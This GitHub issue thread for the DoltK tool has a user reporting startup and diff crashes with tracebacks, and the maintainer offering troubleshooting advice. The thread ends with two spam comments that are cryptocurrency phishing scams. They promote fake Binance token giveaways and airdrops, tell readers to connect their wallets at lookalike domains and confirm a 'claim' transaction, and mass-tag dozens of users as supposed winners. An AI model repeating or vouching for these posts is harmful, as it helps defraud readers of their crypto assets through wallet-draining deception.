### ISSUE TITLE
Can't open repo

### ISSUE THREAD

**Issue by latot** [abmyii/DoltK#7]
Hi all!, just installed rn.

Gentoo 64, Dolt 1.0.0, doltk-0.1

First install

```
git clone "https://github.com/abmyii/DoltK"
cd DoltK
python3.10 -m venv pyenv
source pyenv/bin/activate
pip install -r requirements.txt
pip install .
```

In any other place:
```
dolt init
dolt sql-serer
#in a new tab
doltk.py
FileNotFoundError: [Errno 2] Does not exists file or folder: 'ui/mainwindow.ui'
```

Thx!

**Comment by abmyii** [comment]
Hello! This error appears to be the relative path not being found. Did you run `doltk.py` while in the `DoltK` folder?

**Comment by latot** [comment]
nope, out of it, in a Dolt repo folder.

**Comment by abmyii** [comment]
So the correct way to run doltk is from the DoltK folder, with a path to the Dolt repo (not the `.dolt` folder - the folder which contains it). Try that and see if it works!

**Comment by latot** [comment]
mmm:
```
Traceback (most recent call last):
  File "/home/pipe/Documentos/git/DoltK/pyenv/bin/doltk.py", line 122, in on_commit_changed
    self.diff_model.load_diff(self.repo, commit)
  File "/home/pipe/Documentos/git/DoltK/pyenv/lib/python3.10/site-packages/models/diff_model.py", line 113, in load_diff
    self.current_table = list(self.diff)[0]
IndexError: list index out of range
Abortado (`core' generado)
```

Maybe because, there is no tables?

**Comment by abmyii** [comment]
Yes, that may be why -- try a repo with a table and at least one commit?

**Comment by latot** [comment]
sadly still does not works D:

```
doltk.py /home/user/dolt/dolt
Warning: Ignoring XDG_SESSION_TYPE=wayland on Gnome. Use QT_QPA_PLATFORM=wayland to run on Wayland anyway.
QSocketNotifier: Can only be used with threads started with QThread
/home/user/Documentos/git/DoltK/pyenv/lib/python3.10/site-packages/models/diff_model.py:75: FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.
  df = df.append(
Traceback (most recent call last):
  File "/home/user/Documentos/git/DoltK/pyenv/bin/doltk.py", line 141, in select_table
    self.resize_diff_columns()
  File "/home/user/Documentos/git/DoltK/pyenv/bin/doltk.py", line 147, in resize_diff_columns
    self.ui.diff.setColumnWidth(
TypeError: setColumnWidth(self, column: int, width: int): argument 2 has unexpected type 'float'
Abortado (`core' generado)
```

Thx!

**Comment by latot** [comment]
mm, is weird this error:

```
Warning: Ignoring XDG_SESSION_TYPE=wayland on Gnome. Use QT_QPA_PLATFORM=wayland to run on Wayland anyway.
QSocketNotifier: Can only be used with threads started with QThread
/home/user/Documentos/git/DoltK/pyenv/lib/python3.10/site-packages/models/diff_model.py:75: FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.
  df = df.append(
/home/user/Documentos/git/DoltK/pyenv/lib/python3.10/site-packages/models/diff_model.py:181: FutureWarning: The series.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.
  column = column.append(pd.Series(column.name))  # Default size
Traceback (most recent call last):
  File "/home/user/Documentos/git/DoltK/pyenv/bin/doltk.py", line 122, in on_commit_changed
    self.diff_model.load_diff(self.repo, commit)
  File "/home/user/Documentos/git/DoltK/pyenv/lib/python3.10/site-packages/models/diff_model.py", line 113, in load_diff
    self.current_table = list(self.diff)[0]
IndexError: list index out of range
```

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Shafain, @kevng1512, @dinosv, @zmughal, @michalbrys, @sudoghut, @s3bpmb, @jasonehines, @mchl18, @Oz-Oguz, @Hi-ip, @wnechtman, @warisali2, @davidwuya, @satler-git, @amishakov, @DarrenKwonDev, @RecoFu, @saihv, @topotopo, @Rdmckay, @sukhmani1303, @knowalinski, @josh-kaplan, @ejwessel, @brpapa, @samkit-jain, @isstiaung, @clumsy, @albandiguer, @niwodexin, @capitulation, @m0sh1x2, @botsys, @my2582, @Kamesh-K, @JasonNero, @Alexragomes, @i10s, @kumaranvpl, @shaun-mathew, @jowilki, @pliew, @Carsten-R, @velezbeltran, @KR1ST1AN, @BiswajitDtta, @slavikdev, @plutochn, @chetan-chadha
